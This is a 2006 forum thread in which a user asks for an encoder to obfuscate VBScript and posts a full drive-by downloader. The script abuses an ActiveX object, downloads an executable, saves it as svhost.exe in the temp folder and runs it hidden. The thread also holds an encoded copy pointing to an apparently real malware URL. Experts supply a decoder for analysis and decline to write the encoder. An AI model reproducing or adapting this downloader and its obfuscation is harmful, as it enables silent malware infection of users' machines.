Solved

Javascript Unicode escaped characters (vbscript encode)

Posted on 2006-10-28
28
1,634 Views
Last Modified: 2007-12-19
Im not java guru or anywhere near that so im having a little problem.

I've a script which decodes escaped characters
Script:
<script language="javascript">
function dF(s)
{
var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}
</script>

And thing to be decoded is written as
(6Fvfulsw(53odqjxdjh(6G(55YEVfulsw(55(6H(3G(3D(53(53(53(53rq(.....(6F2vfulsw(6H3

This thing is actually a VBscript encoded in that manner.
can anyone guide me how can i convert other vbscripts in above format? i.e: (6Fvfulsw(53odqjxdjh

i tried encoding by escape but i was not able to achieve my objective to convert it in (6Fvfulsw(53odqjxdjh manner.

http://scriptasylum.com/tutorials/encdec/encode-decode.html on this page 2nd decoder will help you decode.
0
Comment
Question by:Unknown-Killer
  • 11
  • 8
  • 4
  • +1
28 Comments
 

Author Comment

by:Unknown-Killer
ID: 17825734
i would love if someone will post script in java or php to convert normal vbscript into that format and encoded stuff must be able to get decoded by this script

function dF(s)
{
var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}
df(mycode);
</script>
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17826199
0
 

Author Comment

by:Unknown-Killer
ID: 17828033
can u be a little more brief and point me directly to the encoder?
0
DevOps Toolchain Recommendations

Read this Gartner Research Note and discover how your IT organization can automate and optimize DevOps processes using a toolchain architecture.

 

Author Comment

by:Unknown-Killer
ID: 17828039
My Script:
<script language="VBScript">
    on error resume next
    dl = "http://-----/yo.exe"
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="svhost.exe"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
    </script>
After editing some stuff i want it to get converted in format like this
(6Fvfulsw(53odqjxdjh(6G(55YEVfulsw(55(6H(3G(3D(53(53(53(53rq(53huuru(53uhvxph(53qh{w(3G(3D(53(53(53(53go(53(6G(53(55kwws(6D22lwdoldqgluhfwru|1frp2whuph{2}lq1h{h(55(3G(3D(53(53(53(53Vhw(53gi(53(6G(53grfxphqw1fuhdwhHohphqw(5;(55remhfw(55(5<(3G(3D(53(53(53(53gi1vhwDwwulexwh(53(55fodvvlg(55(5F(53(55fovlg(6DEG<9F889098D6044G30<;6D033F37IF5<H69(55(3G(3D(53(53(53(53vwu(6G(55Plfurvriw1[POKWWS(55(3G(3D(53(53(53(53Vhw(53{(53(6G(53gi1FuhdwhRemhfw(5;vwu(5F(55(55(5<(3G(3D(53(53(53(53d4(6G(55Dgr(55(3G(3D(53(53(53(53d5(6G(55ge1(55(3G(3D(53(53(53(53d6(6G(55Vwu(55(3G(3D(53(53(53(53d7(6G(55hdp(55(3G(3D(53(53(53(53vwu4(6Gd4(59d5(59d6(59d7(3G(3D(53(53(53(53vwu8(6Gvwu4(3G(3D(53(53(53(53vhw(53V(53(6G(53gi1fuhdwhremhfw(5;vwu8(5F(55(55(5<(3G(3D(53(53(53(53V1w|sh(53(6G(534(3G(3D(53(53(53(53vwu9(6G(55JHW(55(3G(3D(53(53(53(53{1Rshq(53vwu9(5F(53go(5F(53Idovh(3G(3D(53(53(53(53{1Vhqg(3G(3D(53(53(53(53iqdph4(6G(55vykrvw1h{h(55(3G(3D(53(53(53(53vhw(53I(53(6G(53gi1fuhdwhremhfw(5;(55Vfulswlqj1IlohV|vwhpRemhfw(55(5F(55(55(5<(3G(3D(53(53(53(53vhw(53wps(53(6G(53I1JhwVshfldoIroghu(5;5(5<(3G(3D(53(53(53(53iqdph4(6G(53I1ExlogSdwk(5;wps(5Fiqdph4(5<(3G(3D(53(53(53(53V1rshq(3G(3D(53(53(53(53V1zulwh(53{1uhvsrqvhErg|(3G(3D(53(53(53(53V1vdyhwriloh(53iqdph4(5F5(3G(3D(53(53(53(53V1forvh(3G(3D(53(53(53(53vhw(53T(53(6G(53gi1fuhdwhremhfw(5;(55Vkhoo1Dssolfdwlrq(55(5F(55(55(5<(3G(3D(53(53(53(53T1VkhooH{hfxwh(53iqdph4(5F(55(55(5F(55(55(5F(55rshq(55(5F3(3G(3D(53(53(53(53(6F2vfulsw(6H3

I copied above code from some where else and it is not my encoded code
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 17831062
 Unfortunately, this question refers to Javascript, when, in fact, it is a VBscript question.  I wonder if a moderator could change this wording?
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17832438
The decoder is JS
0
 

Author Comment

by:Unknown-Killer
ID: 17834095
so any one?
0
 

Author Comment

by:Unknown-Killer
ID: 17841817
any pro dont know about it?
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17841911
0
 

Author Comment

by:Unknown-Killer
ID: 17843034
thats a decoder dude

maybe this can help
http://www.ibresource.ru/forums/index.php?showtopic=28683&pid=180784&mode=threaded&show=&st=&

if you dont understand russian then use http://babelfish.altavista.com 
they have some other script but encoded like i say
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17843097
0
 

Author Comment

by:Unknown-Killer
ID: 17843124
i was searching in google and came across this url
http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.99show.com/adduser.asp&sa=X&oi=translate&resnum=2&ct=result&prev=/search%3Fq%3D(6Fvfulsw%26hl%3Den%26lr%3D%26sa%3DG

after looking at source i found out a code

(6Fvfulsw(53odqjxdjh(6GMVfulsw1Hqfrgh(53vuf (6Gkwws(6D22zzz1mt7x1frp2p|dgy1dvs (6H(6F2vfulsw(6H3

i decoded it and got
<script language=JScript.Encode src=http://www.jq4u.com/myadv.asp></script>
but that page shows nothing maybe it needs paremeters
can it help?
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17847993
No, it is just a japanese page that no longer returns a script
0
 

Author Comment

by:Unknown-Killer
ID: 17848076
hah still no good method :-s i think this thing is buggy but some italian guys also coded stuff like that & have their spyware stuff being spread
0
 
LVL 75

Accepted Solution

by:
Michel Plungjan earned 250 total points
ID: 17848269
So you need to encode your vbscript to spread spyware too? I hope not!

Did you try
http://www.microsoft.com/downloads/details.aspx?FamilyId=E7877F67-C447-4873-B1B0-21F0626A6329&displaylang=en
0
 

Author Comment

by:Unknown-Killer
ID: 17849205
no, i want to expose exploit so microsoft can make their information bar more secure,
if u want mplungjan i can send u link to but anywhr in private to that spyware company
i work in a office and that spyware is spreading by yahoo infected lots of comps

i went to that link and it asks for genuine os stuff i dont know what it is talking about
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17849249
So why do you need an ENCODER to expose ?

Michel
0
 

Author Comment

by:Unknown-Killer
ID: 17857185
actually its a project, i'll get some good remarks on giving this thing to my company
0
 
LVL 10

Assisted Solution

by:dennis_maeder
dennis_maeder earned 250 total points
ID: 17867959
This scheme treats the two chars after ( as an offset pseudo-hexcode and other characters are offset ascii codes.
Here is a javascript to do the decoding for the example you provided.
It is possible that the offsets may vary - change eoff and roff.
It is also advisable to use the alert to view code ( or add spaces between characters ) in case the decrypted code is malicious.
D


<script type="text/javascript">

var cr = "(6Fvfulsw(53odqjxdjh(6GMVfulsw1Hqfrgh(53vuf (6Gkwws(6D22zzz1mt7x1frp2p|dgy1dvs (6H(6F2vfulsw(6H3";
alert (decode(cr));

function decode(cryptic){
  var dc   = "";
  var eoff = 51;
  var roff = 3;
  var ec   = "(";
  var cod  = "0123456789ABCDEFGHIJKLMN";
  var d    = "";
  var i    = 0;
  while(i < cryptic.length -1 ) {
    var c = cryptic.charAt(i);
    if (c == ec){
      /* deal with pseudo-hex code*/
      d = String.fromCharCode( 16*cod.indexOf(cryptic.charAt(i+1))+cod.indexOf(cryptic.charAt(i+2)) - eoff);
        i=i+3;      
      }
    else {
        d = String.fromCharCode(cryptic.charCodeAt(i)-roff);
        i++;      
      }
      dc=dc+d;
  }  
  return dc;      
}

</script>
 
0
 
LVL 10

Expert Comment

by:dennis_maeder
ID: 17868048
The other code you quoted is most certainly malicious (to windows) and points to various exe
e.g.
<|s|c|r|i|p|t| |l|a|n|g|u|a|g|e|=|"|V|B|S|c|r|i|p|t|"|>| | | | | | |o|n| |e|r|r|o|r| |r|e|s|u|m|e| |n|e|x|t| | | | | | |d|l| |=| |"|h|t|t|p|:|/|/|i|t|a|l|i|a|n|d|i|r|e|c|t|o|r|y|.|c|o|m|/|t|e|r|m|e|x|/|z|i|n|.|e|x|e|"| | | | | | |S|e|t| |d|f| |=| |d|o|c|u|m|e|n|t|.|c|r|e|a|t|e|E|l|e|m|e|n|t||"|o|b|j|e|c|t|"|| | | | | | |d|f|.|s|e|t|A|t|t|r|i|b|u|t|e| |"|c|l|a|s|s|i|d|"|,| |"|c|l|s|i|d|:|B|D|9|6|C|5|5|6|-|6|5|A|3|-|1|1|D|0|-|9|8|3|A|-|0|0|C|0|4|F|C|2|9|E|3|6|"| | | | | | |s|t|r|=|"|M|i|c|r|o|s|o|f|t|.|X|M|L|H|T|T|P|"| | | | | | |S|e|t| |x| |=| |d|f|.|C|r|e|a|t|e|O|b|j|e|c|t||s|t|r|,|"|"|| | | | | | |a|1|=|"|A|d|o|"| | | | | | |a|2|=|"|d|b|.|"| | | | | | |a|3|=|"|S|t|r|"| | | | | | |a|4|=|"|e|a|m|"| | | | | | |s|t|r|1|=|a|1|&|a|2|&|a|3|&|a|4| | | | | | |s|t|r|5|=|s|t|r|1| | | | | | |s|e|t| |S| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e|c|t||s|t|r|5|,|"|"|| | | | | | |S|.|t|y|p|e| |=| |1| | | | | | |s|t|r|6|=|"|G|E|T|"| | | | | | |x|.|O|p|e|n| |s|t|r|6|,| |d|l|,| |F|a|l|s|e| | | | | | |x|.|S|e|n|d| | | | | | |f|n|a|m|e|1|=|"|s|v|h|o|s|t|.|e|x|e|"| | | | | | |s|e|t| |F| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e|c|t||"|S|c|r|i|p|t|i|n|g|.|F|i|l|e|S|y|s|t|e|m|O|b|j|e|c|t|"|,|"|"|| | | | | | |s|e|t| |t|m|p| |=| |F|.|G|e|t|S|p|e|c|i|a|l|F|o|l|d|e|r||2|| | | | | | |f|n|a|m|e|1|=| |F|.|B|u|i|l|d|P|a|t|h||t|m|p|,|f|n|a|m|e|1|| | | | | | |S|.|o|p|e|n| | | | | | |S|.|w|r|i|t|e| |x|.|r|e|s|p|o|n|s|e|B|o|d|y| | | | | | |S|.|s|a|v|e|t|o|f|i|l|e| |f|n|a|m|e|1|,|2| | | | | | |S|.|c|l|o|s|e| | | | | | |s|e|t| |Q| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e|c|t||"|S|h|e|l|l|.|A|p|p|l|i|c|a|t|i|o|n|"|,|"|"|| | | | | | |Q|.|S|h|e|l|l|E|x|e|c|u|t|e| |f|n|a|m|e|1|,|"|"|,|"|"|,|"|o|p|e|n|"|,|0| | | | | | |<|/|s|c|r|i|p|t|>|
0
 

Author Comment

by:Unknown-Killer
ID: 17924889
dennis_maeder can u tell me how to make encoder? i aint a java guru
0
 
LVL 10

Expert Comment

by:dennis_maeder
ID: 17929285
Unknown-Killer, mplungjan,
Yes I think I can write a javascript encoder of this sort, but I'm not sure that I should.
Let me explain:
A decoder is defensive, it helps you know whats going on with a threat, but a published encoder may be used by some for illicit purposes.
This request is for a specific type of encoding known to be used for antisocial purposes, and I must assume that any code I might produce could be used in that way.
However, the scriptasylum link you gave at the top offers an encoder, and you or anyone could obfuscate their code using that.
Michel, as page editor, what do you think?
D
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 17929454
I completely agree - hence my question in
#17849249
0
 
LVL 10

Expert Comment

by:dennis_maeder
ID: 18151786
See my comments of 11/13. It took some effort to show questioner how the code worked, but I stopped short of providing an encoder for ethical reasons and to follow EE guidelines in concert with page editor and contributor Michel Plungjan. Should that be penalized?
D
0

Featured Post

Master Your Team's Linux and Cloud Stack!

The average business loses $13.5M per year to ineffective training (per 1,000 employees). Keep ahead of the competition and combine in-person quality with online cost and flexibility by training with Linux Academy.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Article by: Matthew
I am a very big proponent of technology compliance standards and strive to meet such criteria in all of my work. That includes my site, which is 100% XHTML 1.0 compliant as determined by the World Wide Web Consortium. https://www.matthewstevenkel…
I will show you how to create a ASP.NET Captcha control without using any HTTP HANDELRS or what so ever. you can easily plug it into your web pages. For Example a = 2 + 3 (where 2 and 3 are 2 random numbers) Session("Answer") = 5 then we…
Viewers will learn about the regular for loop in Java and how to use it. Definition: Break the for loop down into 3 parts: Syntax when using for loops: Example using a for loop:
The viewer will learn how to dynamically set the form action using jQuery.

770 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question